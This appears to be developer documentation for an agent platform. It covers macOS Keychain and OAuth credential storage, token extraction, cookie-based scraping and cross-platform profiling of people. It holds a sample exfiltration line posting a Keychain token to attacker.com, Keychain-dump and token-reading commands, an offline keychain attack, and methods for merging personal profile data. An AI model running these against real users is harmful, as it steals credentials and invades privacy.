When you add a Google account in System Settings → Internet Accounts, macOS registers it at the OS level. This shows up as “macOS” in Google’s authorized apps list. Calendar, Contacts, Mail, and third-party apps that delegate to the system (like BusyContacts for CardDAV) all use this connection.

The accounts live in a SQLite database:

~/Library/Accounts/Accounts4.sqlite   (macOS 15+)
~/Library/Accounts/Accounts5.sqlite   (some macOS versions)

Detection: Query the ZACCOUNT / ZACCOUNTTYPE tables:

import sqlite3
conn = sqlite3.connect(f"file:{accounts_db}?mode=ro", uri=True)
cursor = conn.cursor()
cursor.execute("""
    SELECT a.ZUSERNAME, t.ZIDENTIFIER
    FROM ZACCOUNT a
    LEFT JOIN ZACCOUNTTYPE t ON a.ZACCOUNTTYPE = t.Z_PK
    WHERE t.ZIDENTIFIER = 'com.apple.account.Google'
""")

Requires Full Disk Access — ~/Library/Accounts/ is protected by macOS TCC. The process reading it (Terminal, VS Code, the AgentOS engine) must have Full Disk Access granted in System Settings → Privacy & Security.

Local traces:

Rows in Accounts4.sqlite with type com.apple.account.Google
Child accounts for CalDAV, CardDAV, IMAP, SMTP under the parent Google entry

Pattern 3: Server-side OAuth (vendor backend)

Apps like Spark (Readdle) authenticate through their vendor’s backend server. The user authorizes Readdle’s server-side OAuth app in their browser, and the server manages the Google tokens. The local app communicates with the vendor server, not directly with Google.

This pattern is invisible to local scanning. There’s no Google client ID in Info.plist, no OAuth token in the Keychain. The only local traces are:

"svce" = "SparkDesktop"              "acct" = "RSMSecureEnclaveKey"
"svce" = "com.readdle.spark.account.auth"  "acct" = "RSMSecureEnclaveKey"

These are Secure Enclave keys for the app’s own auth — they don’t contain Google tokens, they protect the app’s session with Readdle’s servers.

Detection: No reliable local detection. The only way to see these is to query Google’s OAuth management API or check myaccount.google.com/permissions directly.

Ghost entries: When server-side OAuth apps are uninstalled, the Keychain entries remain but the app bundle is gone. The Google authorization also persists (the vendor server still has the tokens) until the user explicitly revokes it in Google’s settings.

Summary

Pattern	Examples	How to detect	Shows in Google as
Native PKCE	Mimestream, BusyContacts, Strongbox	`Info.plist` URL scheme scan	App name
macOS Internet Accounts	Calendar, Contacts, Mail	`Accounts4.sqlite` (needs FDA)	“macOS”
Server-side OAuth	Spark, potentially others	Not locally detectable	Vendor name (Readdle)

Finding Google OAuth Client IDs (Native PKCE)

The detailed walkthrough for Pattern 1 above. The registered URL scheme in Info.plist encodes the client ID:

plutil -p /Applications/SomeApp.app/Contents/Info.plist | grep googleusercontent

Client secrets in binaries

Google OAuth client secrets for desktop apps begin with GOCSPX-. You can search binaries with:

strings /Applications/SomeApp.app/Contents/MacOS/SomeApp | grep "GOCSPX-"

However, Google explicitly treats desktop app client secrets as non-secret. The Google docs say: “The client secret is not secret in this context.” Desktop apps are “public clients” — the secret is in the binary, reversible, and Google knows it.

What actually protects the user is:

The refresh token being user-specific and Keychain-stored
PKCE preventing one-time auth code interception (see below)
Google’s revocation flow (myaccount.google.com/permissions)

Full Credential Audit

To audit everything sensitive on the machine:

# 1. All non-Apple Keychain entries (service + account names)
security dump-keychain 2>/dev/null \
  | grep '"svce"\|"acct"' \
  | grep -iv "apple\|icloud\|cloudkit\|wifi\|bluetooth\|cert\|nsurl\|networkservice\|airportd\|safari\|webkit\|xpc\|com\.apple\." \
  | sort -u

# 2. Apps with Google OAuth client IDs (all install locations)
for dir in /Applications /Applications/Setapp ~/Applications; do
    [ -d "$dir" ] || continue
    for app in "$dir"/*.app; do
        r=$(plutil -p "$app/Contents/Info.plist" 2>/dev/null | grep "googleusercontent")
        [ -n "$r" ] && echo "$(basename $app .app) ($dir): $r"
    done
done

# 3. Apps using the Electron Safe Storage pattern
security dump-keychain 2>/dev/null | grep "Safe Storage"

# 4. Apps with direct token entries
security dump-keychain 2>/dev/null \
  | grep '"svce"' \
  | grep -iE "token|auth|key|secret|credential|oauth|refresh|access"

Extracting a Specific Token

Once you know the service name and account name from the audit:

# Returns the raw value (password field)
security find-generic-password -s "SERVICE_NAME" -a "ACCOUNT_NAME" -w

For apps that store binary plists (like Mimestream):

security find-generic-password -s "Mimestream: user@example.com" -a "OAuth" -w
# Returns hex-encoded binary plist
# Decode: xxd -r -p <<< "$HEX" | plutil -convert json - -o -

This is exactly how the mimestream.credential_get skill works — command: step runs the security command, plist: step decodes the binary plist.

Keychain ACLs — Why Most Items Are Readable

macOS Keychain has two access levels:

Level	Behavior	Who uses it
No ACL (default)	Any process running as the same user can read silently	Most apps
ACL-protected	macOS prompts “Allow / Deny / Always Allow”	1Password, some system services

The ACL-protected dialog looks like:

"SomeApp" wants to use your confidential information stored in "item name" in your keychain.
[Deny]  [Allow]  [Always Allow]

Most apps don’t set ACLs. The Keychain is protected against:

Other user accounts on the same machine
Sandboxed App Store apps (they can only access items they created)
Remote attackers

It is not protected against:

Processes running as the same user (same UID)
Malicious code injected via supply chain attacks
Any script or tool run in your Terminal session

How the Keychain Is Actually Encrypted

The login keychain (~/Library/Keychains/login.keychain-db) is an encrypted SQLite file, but your processes never decrypt it directly. The OS handles this through a privileged daemon called securityd.

Key derivation chain:

Login password
    ↓  PBKDF2 (salt stored in the .keychain-db file)
Master encryption key  ←── held in securityd memory after login
    ↓  wraps
Per-item encryption keys
    ↓  decrypts
Item plaintext values

When you log in, macOS unlocks the keychain and securityd holds the master key in memory for the session. The security CLI and Security.framework API talk to securityd — they never read raw bytes from the file. securityd checks ACLs, then hands back plaintext to any authorized caller.

Why your session already has full access: No password is needed at runtime because securityd has the master key in memory from login. Any process you launch inherits your UID, which is all securityd checks for no-ACL items.

The offline copy attack: Because PBKDF2 is deterministic (same password + same salt → same master key, on any machine), copying the .keychain-db file and running security unlock-keychain -p "password" <file> decrypts it fully — no active session needed. File + password = complete access.

Secure Enclave — The Real Hardware Boundary

Touch ID-gated items (kSecAccessControlUserPresence) use a fundamentally different mechanism: the Secure Enclave coprocessor.

Secure Enclave key  ←── hardware-bound, NEVER extractable, tied to this chip
    ↓  wraps
Item encryption key  (stored in .keychain-db, but useless without the Enclave key)
    ↓  decrypts
Item plaintext value

The Enclave key cannot be exported, dumped, or migrated. Touch ID just proves “user is present” to the Enclave, which unwraps the key inside hardware and returns the plaintext. This is the only mechanism where copying the file + knowing the password is not sufficient — the Enclave key lives on a specific chip and nowhere else.

Access matrix:

Item type	Active session (no password)	File copy + password	Different machine
No ACL	✅ silent	✅ works	✅ works
App ACL	✅ with prompt	✅ works	✅ works
Touch ID (`UserPresence`)	✅ prompts Touch ID	❌	❌ never

The Secure Enclave is the only real hardware-enforced wall. Everything else is securityd policy, which any same-user process can request through.

Supply Chain Attack Surface

If malicious code runs as the user (e.g. via a compromised npm package or a malicious skill), it can silently read any non-ACL Keychain item:

# A malicious command step in a skill.yaml could do:
security find-generic-password -s "cursor-refresh-token" -w | \
  curl -sX POST https://attacker.com -d @-

What’s reachable in a typical developer’s Keychain:

Token	What it grants	Lifetime
Google refresh token (Mimestream)	Read/send email, calendar	Until revoked
GitHub CLI token (`gh:github.com`)	Full repo access	Until revoked
Cursor tokens	IDE session, code context	Until expired/revoked
Electron Safe Storage key	Decrypt all browser-stored credentials	Until app reinstalled
Slack Safe Storage key	Decrypt all local Slack data	Until app reinstalled

Implication for AgentOS: Skills with command: steps can execute arbitrary shell commands. Before a public skill registry exists, command: steps in community skills should be audited for Keychain access. See docs/specs/_roadmap.md — skill sandboxing is a listed backlog item.

PKCE — What It Actually Protects

PKCE (Proof Key for Code Exchange) is required for modern desktop OAuth. It is narrower than it sounds.

What it protects: One-time authorization code interception. During the ~10-second window between “user clicks Approve” and “app exchanges the code”, a process could theoretically grab the code off the localhost redirect (port squatting). PKCE makes that useless because the code can’t be exchanged without the verifier, which lives only in the legitimate app’s memory for that window.

What it does not protect: The refresh token sitting in the Keychain. Once the initial auth is done, PKCE is irrelevant. The refresh token is the real long-lived credential and it’s protected only by Keychain access controls (see above).

PKCE protects:           PKCE does NOT protect:
──────────────           ──────────────────────
auth code (10 sec)       refresh token (months)
during initial login     ongoing token renewal

The verifier is never written to disk — it lives in memory for the duration of the login flow and is discarded. This is by design: it only needs to survive the seconds between opening the browser and catching the redirect.

Reverse Engineering — Content Extraction from HTML

When there’s no API, no GraphQL, no Apollo cache — just server-rendered HTML behind a login wall. This doc covers the patterns for authenticated HTML scraping with agentos.http + lxml.

This is Layer 4 of the reverse-engineering docs:

Layer 1: Transport — 1-transport — getting a response at all
Layer 2: Discovery — 2-discovery — finding structured data in bundles
Layer 3: Auth & Runtime — 3-auth — credentials, sessions, rotating config
Layer 4: Content (this file) — extracting data from HTML when there is no API
Layer 5: Social Networks — 5-social — modeling people, relationships, and social graphs
Layer 6: Desktop Apps — 6-desktop-apps — macOS, Electron, local state, unofficial APIs

When You Need This Layer

Not every operation needs HTML scraping. The same site often has a mix:

Data type	Approach	Example
Public catalog data	GraphQL / Apollo cache (Layer 2)	Goodreads book details, reviews, search
User-scoped data behind login	HTML scraping (this doc)	Goodreads friends, shelves, user’s books
Write operations	API calls with session tokens	Rating a book, adding to shelf

Rule of thumb: Check for structured APIs first (Layer 2). Only fall back to HTML scraping when the data is exclusively server-rendered behind authentication.

Skill Architecture: Two Modules

When a skill needs both public API access and authenticated scraping, split into two Python modules:

skills/mysite/
  readme.md          # Skill descriptor — operations point to either module
  public_graph.py    # Public API / GraphQL / Apollo — no cookies needed
  web_scraper.py     # Authenticated HTML scraping — needs cookies

The readme declares separate connections for each:

connections:
  graphql:
    description: "Public API — key auto-discovered"
  web:
    description: "User cookies for authenticated data"
    auth:
      type: cookies
      domain: ".mysite.com"
    optional: true
    label: MySite Session

Operations reference the appropriate connection:

operations:
  search_books:        # public
    connection: graphql
    python:
      module: ./public_graph.py
      function: search_books
      args: { query: .params.query }

  list_friends:        # authenticated
    connection: web
    python:
      module: ./web_scraper.py
      function: run_list_friends
      params: true

The entire cookie lifecycle is handled by agentOS. The Python script never touches browser databases or knows which browser the cookies came from.

How it works

Skill declares connection: web with cookies.domain: ".mysite.com"
Executor finds an installed cookie provider (brave-browser, firefox, etc.)
Provider extracts + decrypts cookies from the local browser database
Executor injects them into params as params.auth.cookies (a Cookie: header string)
Python reads them and passes to http.client()

Python side

def _cookie(ctx: dict) -> str | None:
    """Extract cookie header from AgentOS-injected auth."""
    c = (ctx.get("auth") or {}).get("cookies") or ""
    return c if c else None

def _require_cookies(cookie_header, params, op_name):
    cookie_header = cookie_header or (params and _cookie(params))
    if not cookie_header:
        raise ValueError(f"{op_name} requires session cookies (connection: web)")
    return cookie_header

`params: true` context structure

When a Python executor uses params: true, the function receives the full wrapped context as a single params dict:

{
  "params": { "user_id": "123", "page": 1 },
  "auth": { "cookies": "session_id=abc; token=xyz" }
}

Use a helper to read user params from either nesting level:

def _p(d: dict, key: str, default=None):
    """Read from params sub-dict or top-level."""
    p = (d.get("params") or d) if isinstance(d, dict) else {}
    return p.get(key, default) if isinstance(p, dict) else default

HTTP Client: Shared Across Pages

Create one http.client() per operation and reuse it across paginated requests. This keeps the TCP/TLS connection alive and avoids per-request overhead.

from agentos import http

def _client(cookie_header: str | None) -> http.Client:
    headers = http.headers(waf="standard", accept="html")
    if cookie_header:
        headers["Cookie"] = cookie_header
    return http.client(headers=headers)

# Usage
with _client(cookie_header) as client:
    for page in range(1, max_pages + 1):
        status, html = _fetch(client, url.format(page=page))
        if not _has_next(html):
            break

Pagination

Default: fetch all pages

Make page=0 the default, meaning “fetch everything.” When the caller passes page=N, return only that page. This gives callers control without requiring them to implement their own pagination loop.

def list_friends(user_id, page=0, cookie_header=None, *, params=None):
    if page > 0:
        # Single page
        return _parse_one_page(url.format(page=page), cookie_header)

    # Auto-paginate
    all_items = []
    seen = set()
    with _client(cookie_header) as client:
        for p in range(1, MAX_PAGES + 1):
            status, html = _fetch(client, url.format(page=p))
            items = _parse_page(html)
            for item in items:
                if item["id"] not in seen:
                    seen.add(item["id"])
                    all_items.append(item)
            if not items or not _has_next(html):
                break
    return all_items

Detecting “next page”

Look for pagination controls rather than guessing based on result count:

def _has_next(html_text: str) -> bool:
    return bool(
        re.search(r'class="next_page"', html_text) or
        re.search(r'rel="next"', html_text)
    )

Safety limits

Always cap auto-pagination (MAX_PAGES = 20). A user with 5,000 books shouldn’t trigger 200 sequential requests in a single tool call.

Deduplication

Sites often include the user’s own profile in friend lists, or repeat items across page boundaries. Always deduplicate by ID:

seen: set[str] = set()
for item in page_items:
    if item["id"] not in seen:
        seen.add(item["id"])
        all_items.append(item)

HTML Parsing Patterns

Use data attributes over visible text

Data attributes are more stable than CSS classes or visible text:

# Good: data-rating is the source of truth
stars = row.select_one(".stars[data-rating]")
rating = int(stars["data-rating"]) if stars else None

# Bad: fragile, depends on star rendering
rating_el = row.select_one(".staticStars")

Fallback selector chains

Large sites use different HTML structures across pages, A/B tests, and regions. Instead of matching a single selector, define a priority-ordered list and take the first match. This makes parsers resilient to markup changes.

ORDER_ID_SEL = [
    "[data-component='orderId']",
    ".order-date-invoice-item :is(bdi, span)[dir='ltr']",
    ".yohtmlc-order-id :is(bdi, span)[dir='ltr']",
    ":is(bdi, span)[dir='ltr']",
]

ITEM_PRICE_SEL = [
    ".a-price .a-offscreen",
    "[data-component='unitPrice'] .a-text-price :not(.a-offscreen)",
    ".yohtmlc-item .a-color-price",
]

def _select_one(tag, selectors: list[str]):
    for sel in selectors:
        result = tag.select_one(sel)
        if result:
            return result
    return None

def _select(tag, selectors: list[str]) -> list:
    for sel in selectors:
        result = tag.select(sel)
        if result:
            return result
    return []

Put the most specific, modern selector first (e.g. data-component attributes) and the broadest fallback last. This pattern works especially well for sites like Amazon that ship multiple front-end variants simultaneously.

Reference: skills/amazon/amazon.py — all order/item selectors use this pattern.

Structured table pages (Goodreads `/review/list/`)

Many sites render user data in HTML tables with class-coded columns. Each <td> has a field class you can target directly:

rows = soup.select("tr.bookalike")
for row in rows:
    book_id = row.get("data-resource-id")
    title = row.select_one("td.field.title a").get("title")
    author = row.select_one("td.field.author a").get_text(strip=True)
    rating = row.select_one(".stars[data-rating]")["data-rating"]
    date_added = row.select_one("td.field.date_added span[title]")["title"]

Extraction helpers

Write small focused helpers for each field type rather than inline parsing:

def _extract_date(row, field_class):
    td = row.select_one(f"td.field.{field_class}")
    if not td:
        return None
    span = td.select_one("span[title]")
    if span:
        return span.get("title") or span.get_text(strip=True)
    return None

def _extract_rating(row):
    stars = row.select_one(".stars[data-rating]")
    if stars:
        val = int(stars.get("data-rating", "0"))
        return val if val > 0 else None
    return None

Check early and fail fast when cookies are invalid. Use the SESSION_EXPIRED: prefix convention so the engine can automatically retry with a different cookie provider (see connections.md):

def _is_login_redirect(resp, body: str) -> bool:
    if "ap/signin" in str(resp.url):
        return True
    if "form[name='signIn']" in body[:5000]:
        return True
    return "ap_email" in body[:3000] or "signIn" in body[:3000]

# In any authenticated operation:
if _is_login_redirect(resp, body):
    raise RuntimeError(
        "SESSION_EXPIRED: Amazon redirected to login — session cookies are expired or invalid."
    )

The SESSION_EXPIRED: prefix triggers the engine’s provider-exclusion retry: the engine marks the current cookie provider as stale, excludes it, and retries with the next-best provider. This handles the common case where one browser has stale cookies but another has a fresh session.

Convention: SESSION_EXPIRED: <human-readable reason> for stale auth. Any other exception message means a real failure — the engine won’t retry with different credentials.

AJAX Endpoints for Dynamic Content

Not everything is in the HTML. Many sites load sections dynamically via internal AJAX endpoints that return HTML fragments or JSON. These are often easier to parse than the full page and more stable across redesigns.

Discovering AJAX endpoints

Use Playwright’s capture_network while interacting with the page:

capture_network { url: "https://www.amazon.com/auto-deliveries", pattern: "**/ajax/**", wait: 5000 }

Or inject a fetch interceptor and click the relevant UI element — the interceptor captures the endpoint, params, and response shape.

Amazon’s subscription management page loads content via an AJAX endpoint that returns a JSON payload with embedded HTML:

from lxml import html as lhtml

resp = client.get(
    f"{BASE}/auto-deliveries/ajax/subscriptionList",
    params={"pageNumber": 0},
    headers={
        "X-Requested-With": "XMLHttpRequest",
        "Referer": f"{BASE}/auto-deliveries",
    },
)
data = resp.json()
html_fragment = data.get("subscriptionListHtml", "")
doc = lhtml.fromstring(html_fragment)

Key headers for AJAX: Always include X-Requested-With: XMLHttpRequest and a valid Referer. Many servers check these to distinguish AJAX from direct navigation.

When to look for AJAX endpoints

Signal	Likely AJAX
Content appears after page load (spinner, lazy-load)	Yes
URL changes without full page reload	Yes — check for `pushState` + fetch
Tab/section switching within a page	Yes — each tab may have its own endpoint
Data differs between “View Source” and DevTools Elements	Yes — JS loaded it after

Reference: skills/amazon/amazon.py subscriptions() — AJAX endpoint for Subscribe & Save management.

Adapter Null Safety

When a skill’s adapter maps nested collections (like shelves on an account), not every operation returns those nested fields. Use jaq // [] fallback to prevent null iteration errors:

adapters:
  account:
    id: .user_id
    name: .name
    shelves:
      shelf[]:
        _source: '.shelves // []'    # won't blow up when shelves is absent
        id: .shelf_id
        name: .name

Data Validation Checklist

After building a scraper, cross-reference against the live site:

Check	How
Total count	Compare your result count to what the site header says (“Showing 1-30 of 69”)
Unique IDs	Deduplicate and compare — off-by-one usually means a deleted/deactivated account
Rating counts	Count items with non-null ratings vs. the site’s “X ratings” display
Review counts	Count items with actual review text vs. the site’s “X reviews” display
Field completeness	Spot-check dates, ratings, authors against individual entries on the site
Shelf math	Sum shelf counts and compare to “All (N)” — they may diverge (Goodreads shows 273 but serves 301)

Testing Methodology

1. Save cookies locally for development

Extract cookies once and save to a JSON file for local testing:

# From agentOS:
# run({ skill: "brave-browser", tool: "cookie_get", params: { domain: ".mysite.com" } })

# Or manually build the file:
# scripts/test_cookies.json
[
  {"name": "session_id", "value": "abc123", "domain": ".mysite.com"},
  ...
]

2. Test parsers against real pages

Hit the live site with agentos.http and verify parsing before wiring to agentOS:

with open("scripts/test_cookies.json") as f:
    cookies = json.load(f)
cookie_header = "; ".join(f'{c["name"]}={c["value"]}' for c in cookies)

friends = list_friends("12345", cookie_header=cookie_header)
print(f"Got {len(friends)} friends")

3. Test through agentOS MCP

Once local parsing works, test the full pipeline:

npm run mcp:call -- --skill mysite --tool list_friends \
  --params '{"user_id":"12345"}' --verbose

Operations that require live cookies should use test.mode: write so they’re skipped in automated smoke tests but can be run manually with --write:

test:
  mode: write
  fixtures:
    user_id: "12345"

Real-World Examples

Skill	What’s scraped	Key patterns	Reference
`skills/amazon/`	Orders, products, subscriptions, account identity — all from server-rendered HTML and AJAX	Fallback selector chains, Siege cookie stripping, session warming, AJAX endpoints, `SESSION_EXPIRED` convention	`amazon.py`
`skills/goodreads/`	People (friends, following, followers), books, reviews, groups, quotes, rich profiles — all from HTML	Structured table parsing, data attributes, pagination, dedup	`web_scraper.py`

For social-network-specific modeling patterns (person vs account, relationship types, cross-platform identity), see 5-social.

How to model people, relationships, and social data across platforms like Goodreads, Twitter/X, MySpace, LinkedIn, Instagram, etc.

This is Layer 5 of the reverse-engineering docs:

Layer 1: Transport — 1-transport — getting a response at all
Layer 2: Discovery — 2-discovery — finding structured data in bundles
Layer 3: Auth & Runtime — 3-auth — credentials, sessions, rotating config
Layer 4: Content — 4-content — extracting data from HTML when there is no API
Layer 5: Social Networks (this file) — modeling people, relationships, and social graphs
Layer 6: Desktop Apps — 6-desktop-apps — macOS, Electron, local state, unofficial APIs

Core Principle: People First, Accounts Second

Every social platform has users. But the same person exists across many platforms. The graph should model this in two layers:

Entity	What it represents	Cross-platform?
person	A real human being	Yes — mergeable across platforms
account	Their profile on one platform	No — platform-specific

A person has accounts. An account belongs to a person.

adapters:
  person:
    id: .user_id
    name: .name
    image: .photo_url
    location: .location
    data.gender: .gender
    data.age: .age
    data.birthday: .birthday
    data.website: .website

    has_account:
      account:
        id: .user_id
        name: .name
        handle: .handle
        url: .profile_url
        image: .photo_url

Why this matters: When you later build Twitter and find the same person (by name, website, or explicit cross-link), you can merge the person entities while keeping both accounts distinct. The person is the anchor.

Every social network has some subset of these relationship patterns:

Symmetric (mutual)

Both parties agree. The relationship is bidirectional.

Relationship	Examples
friends	Facebook, Goodreads, MySpace

Operation pattern: list_friends(user_id) → person[]

Asymmetric (directed)

One party follows, the other may or may not follow back.

Relationship	Examples
following	Twitter, Instagram, Goodreads
followers	Twitter, Instagram, Goodreads

Operation pattern: two separate operations with different directions.

list_following:
  description: People this user follows
  returns: person[]

list_followers:
  description: People following this user
  returns: person[]

Group membership

User belongs to a group/community.

Relationship	Examples
member_of	Goodreads groups, Facebook groups, Reddit subreddits, Discord servers

list_groups:
  returns: group[]

Profile Depth: Light vs Rich

Social operations return people at two levels of depth:

Light (from list operations)

When you scrape a friends list or followers page, you get limited data per person:

{
    "user_id": "10000001",
    "name": "Alex Reader",
    "photo_url": "https://...",
    "location": "Berlin",
    "books_count": 414,
    "friends_count": 138,
}

This is what list_friends, list_following, list_followers return. Enough to create the person entity and the relationship edge.

Rich (from profile scrape)

When you scrape an individual profile page, you get the full picture:

{
    "user_id": "10000001",
    "name": "Alex Reader",
    "handle": "alexreader",
    "photo_url": "https://...",
    "gender": "...",
    "age": 32,
    "birthday": "...",
    "location": "Berlin, Germany",
    "website": "https://example.com",
    "about": "...",
    "interests": "...",
    "joined_date": "January 2015",
    "ratings_count": 159,
    "avg_rating": "3.82",
    "friends_count": 138,
    "favorite_books": [...],
    "currently_reading": [...],
    "favorite_genres": [...],
}

This is what get_person(user_id) returns.

Pattern: Always provide both. The light operations populate the graph with stubs. The rich operation fills them in when you need the detail. The adapter handles both — missing fields are just null.

Authors Are People Too

On platforms with content creators (Goodreads authors, Twitter blue-checks, YouTube channels), the creators are people with special roles. Model them as:

person entity (they’re a human being)
author/creator entity (their creative identity)
account entity (their platform presence)

On Goodreads, an author appears in multiple contexts:

Context	How we encounter them
Book’s `written_by` relationship	author entity with ID and URL
`list_following` results	person entity (they follow authors)
Quote attribution	author entity
Author profile page	full author entity with books

The key insight: extract real author IDs everywhere, not just name strings. When a book list shows “Christie, Agatha” as a link to /author/show/123715, capture the ID so the graph can connect the book → author → their other books.

author_el = row.select_one("td.field.author a")
if author_el:
    href = author_el.get("href", "")
    m = re.search(r"/author/show/(\d+)", href)
    if m:
        author_id = m.group(1)
        author_url = _abs_url(href)

Also fix name ordering — many platforms store names as “LastName, FirstName” in table views:

def _flip_name(name: str) -> str:
    if "," in name:
        parts = [p.strip() for p in name.split(",", 1)]
        if len(parts) == 2 and parts[1]:
            return f"{parts[1]} {parts[0]}"
    return name

Content People Create

Social platforms aren’t just about connections — people create content. Each platform has its own content types that should map to entities:

Platform	Content types	Entity mapping
Goodreads	Books read, reviews, ratings, quotes	book, review, quote
Twitter	Tweets, retweets, likes	post, engagement
MySpace	Music, blog posts, comments	track, post, comment
Instagram	Photos, stories, reels	media, story
LinkedIn	Posts, articles, endorsements	post, article

The person’s relationship to content matters:

# Things a person created
person → wrote → review
person → posted → post

# Things a person engaged with
person → rated → book (with rating value)
person → liked → quote
person → saved → book (to shelf)

# Things attributed to a person
quote → attributed_to → author
book → written_by → author

Profile Page Parsing Patterns

Social profile pages follow remarkably similar structures across platforms. Common patterns:

Info box / details section

Most profiles have a key-value info section:

titles = soup.select(".infoBoxRowTitle")
items = soup.select(".infoBoxRowItem")
info = {}
for t, v in zip(titles, items):
    label = clean(t.get_text()).lower()
    value = clean(v.get_text())
    info[label] = value

Stats bar

Ratings, posts, followers — usually near the top:

stats_text = clean(stats_el.get_text())
ratings = re.search(r"([\d,]+)\s+ratings?", stats_text)
avg = re.search(r"\(([\d.]+)\s+avg\)", stats_text)

Section headers → content blocks

Profile pages have named sections (favorite books, currently reading, groups). The header-to-content relationship varies by platform:

# Pattern 1: Header is inside a container, content is a sibling div
for hdr in soup.select("h2.brownBackground"):
    parent_box = hdr.find_parent("div", class_="bigBox")
    body = parent_box.select_one(".bigBoxBody") if parent_box else None

# Pattern 2: Header IS the container, content follows
for hdr in soup.select(".sectionHeader"):
    body = hdr.find_next_sibling()

# Pattern 3: Header + content share a parent
for section in soup.select(".profileSection"):
    title = section.select_one("h3")
    content = section.select_one(".sectionContent")

Always check the actual DOM structure — don’t assume.

Pagination for Social Lists

Social lists (friends, followers, following) almost always paginate. Key patterns from Goodreads that will apply elsewhere:

Auto-pagination with `page=0`

def list_friends(user_id, page=0, ...):
    """page=0 means fetch all pages automatically."""
    if page > 0:
        return _fetch_single_page(page)

    all_items = []
    seen = set()
    for p in range(1, MAX_PAGES + 1):
        items = _fetch_single_page(p)
        new = [i for i in items if i["user_id"] not in seen]
        all_items.extend(new)
        seen.update(i["user_id"] for i in new)
        if not _has_next(html_text):
            break
    return all_items

Next-page detection

def _has_next(html_text: str) -> bool:
    return 'class="next_page"' in html_text or "rel=\"next\"" in html_text

Safety limits

Always cap pagination to prevent infinite loops:

MAX_PAGES = 50

Cross-Platform Identity Signals

When building skills for multiple social networks, look for identity signals that help merge person entities across platforms:

Signal	Reliability	Example
Explicit cross-link	High	Website URL in bio pointing to another profile
Same handle	Medium	`@jcontini` on both Twitter and Goodreads
Same name + location	Low	“Joe Contini, Austin TX”
Same profile photo	Medium	Image similarity matching
Email (if available)	High	Unique identifier

For now, just capture everything. The website field on a person’s profile is particularly valuable — it often links to a personal site that aggregates all their social profiles.

When building a skill for a new social platform:

Identify the entity types — what do people create, consume, and engage with?
Map relationships — friends? followers? groups? what content do they produce?
Model as person → account — not just accounts
Light + rich profiles — list operations for stubs, get_person for detail
Extract real IDs everywhere — not just name strings; follow links for IDs
Capture cross-platform signals — website, handle, email
Auto-paginate social lists — friends, followers, etc. are always paginated
Handle name formatting — “LastName, FirstName” flipping, Unicode, etc.
Look for section-based profile data — favorite X, currently Y, groups, etc.
Test with a real profile — verify data richness against what you see in the browser

Real-World Examples

Skill	Social patterns used	Reference
`skills/goodreads/`	person → account, friends, following/followers, groups, quotes, authors as people, favorite books, currently reading, profile scraping	`web_scraper.py`
Future: `skills/myspace/`	person → account, friends, followers, music, blog posts	—
Future: `skills/twitter/`	person → account, following/followers, tweets, likes, retweets	—

Reverse Engineering — macOS Desktop & Electron Apps

When the target is a desktop app (Slack, Notion, Granola, VS Code, etc.) that stores data locally and syncs with a backend. The API is often undocumented; the app itself is your best source.

This is Layer 6 of the reverse-engineering docs:

Layer 1: Transport — 1-transport — TLS, headers, WAF bypass
Layer 2: Discovery — 2-discovery — web bundles, Apollo cache
Layer 3: Auth & Runtime — 3-auth — credentials, sessions
Layer 4: Content — 4-content — HTML scraping
Layer 5: Social Networks — 5-social — people, relationships
Layer 6: Desktop Apps (this file) — macOS, Electron, local state, unofficial APIs
- electron.md — Electron deep dive: asar extraction, token files, CrossAppAuth, feature flags

When to Use This Approach

Target	Approach
Web app (browser-based)	Layers 1–4 — bundles, GraphQL, cookies
Desktop app with local data	This doc — app bundle + Application Support
Hybrid (web + desktop client)	Both — auth may live in desktop, API is same

Desktop apps often reuse the same backend API as their web counterpart. The desktop client just embeds a token or session that the web version would get from a browser cookie flow. If you find the token, you can call the API directly from Python — no headless browser, no TLS fingerprint games.

Identify the App Stack

Is it Electron?

# Check for the telltale structure
ls -la /Applications/SomeApp.app/Contents/Resources/
# Look for: app.asar (bundled JS) or app/ (unpacked)

Electron apps ship:

app.asar — compressed archive of the app’s JS/HTML
Resources/ — icons, native modules
Chromium runtime inside Frameworks/

Find the app support directory

macOS apps store user data under:

~/Library/Application Support/<AppName>/

Common subdirs:

Directory	What it contains
`*.json` (supabase, stored-accounts, local-state)	Auth tokens, config, feature flags
`Cache/`, `Code Cache/`	Chromium cache (less useful)
`Local Storage/`, `IndexedDB/`	WebStorage — sometimes has SQLite DBs
`Session Storage/`	Ephemeral state
`blob_storage/`	Binary blobs
`*.json` (cache-v6, state)	Entity cache — synced from backend, often the gold

Auth: Steal the Token

Desktop apps must persist auth somewhere. The user is logged in; the app survives restarts. Find where.

Common patterns

File pattern	Typical content
`supabase.json`, `auth.json`, `tokens.json`	JWT `access_token`, `refresh_token`
`stored-accounts.json`	Account list, sometimes with session data
`Cookies` (SQLite)	HTTP-only cookies — harder to extract
Keychain	macOS Keychain — use `security find-generic-password`

Extraction pattern

from pathlib import Path
import json

APP_SUPPORT = Path.home() / "Library" / "Application Support" / "Granola"

def get_token() -> str:
    with open(APP_SUPPORT / "supabase.json") as f:
        data = json.load(f)
    tokens = json.loads(data["workos_tokens"])  # nested JSON string
    return tokens["access_token"]

Tokens often live in nested JSON strings — the outer file is JSON, but some values (like workos_tokens) are themselves JSON strings. Parse twice.

Token lifetime

Desktop app tokens are often refreshed by the app when it’s running. If your skill gets 401, the user needs to open the app to refresh. Document this.

Discovery: App Bundle → API Endpoints

The app’s bundled JS contains every API endpoint it calls.

1. Find the app bundle

# macOS: find by name
mdfind "kMDItemDisplayName == 'Granola*'"

# Or known paths
ls /Applications/Granola.app/Contents/Resources/app.asar

2. Extract strings from the bundle

# If app.asar exists, unpack or search it
npx asar extract /Applications/Granola.app/Contents/Resources/app.asar /tmp/granola-app

# Or just run strings on the binary
strings /Applications/Granola.app/Contents/MacOS/Granola | grep -E "https://|api\.|/v1/|/v2/"

3. Search for endpoint patterns

Pattern	What you’ll find
`https://api.`	Base API URLs
`https://notes.`	Web app / docs URLs (often same backend, different frontend)
`/v1/`, `/v2/`	Versioned API paths
`get-documents`, `get-entity-set`	Endpoint names — these are your operations

4. Infer request shape from usage

Once you have endpoint names, search the bundle for where they’re called:

grep -r "get-entity-set\|get-entity-batch" /tmp/granola-app/

The surrounding code often shows the request body shape: { entity_type: "chat_thread" }.

Discovery: Local Cache → Data Model

The app syncs entities from the backend into a local cache. That cache is your schema discovery.

Find the cache file

Look for large JSON files or SQLite DBs in Application Support:

ls -la ~/Library/Application\ Support/Granola/
# cache-v6.json    <- 800KB, entities inside
# local-state.json <- feature flags, config

Parse the structure

import json
from pathlib import Path

cache_path = Path.home() / "Library/Application Support/Granola/cache-v6.json"
data = json.loads(cache_path.read_text())
